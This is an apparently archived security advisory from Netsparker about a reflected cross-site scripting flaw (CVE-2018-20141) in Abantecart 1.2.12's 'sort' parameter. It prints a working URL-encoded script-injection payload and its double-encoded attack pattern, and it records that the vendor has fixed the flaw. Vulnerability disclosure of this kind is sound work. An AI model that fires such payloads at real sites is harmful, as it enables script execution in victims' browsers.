what you don't know can hurt you

Abantecart 1.2.12 Cross Site Scripting

Abantecart 1.2.12 Cross Site Scripting
Posted Jan 23, 2019
Authored by Omer Citak | Site netsparker.com

Abantecart version 1.2.12 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2018-20141
MD5 | 0edc0824914bad114401c6285e552c46

Abantecart 1.2.12 Cross Site Scripting

Change Mirror Download
Cross-site Scripting Vulnerability in Abantecart 1.2.12

Information
--------------------

Advisory by Netsparker
Name: Reflected Cross-site Scripting in Abantecart 1.2.12
Affected Software: Abantecart
Affected Versions: 1.2.12
Homepage: http://www.abantecart.com/
Vulnerability: Cross-site Scripting
Severity: High
Status: Fixed
CVE-ID: CVE-2018-20141
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Netsparker Advisory Reference: NS-18-049

Technical Details
--------------------

URL: http://{domain}/{abantecart_path}/apparel--accessories?sort=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Ealert%280x003134%29%3C%2FscRipt%3E
Parameter Name: sort
Parameter Type: GET
Attack Pattern: %2527%2522--%253E%253C%252Fstyle%253E%253C%252FscRipt%253E%253CscRipt%253Enetsparker%25280x003134%2529%253C%252FscRipt%253E

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

12th November 2018 - First Contact
13th December 2018 - Vendor Fixed
23th January 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Amer Aitak while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close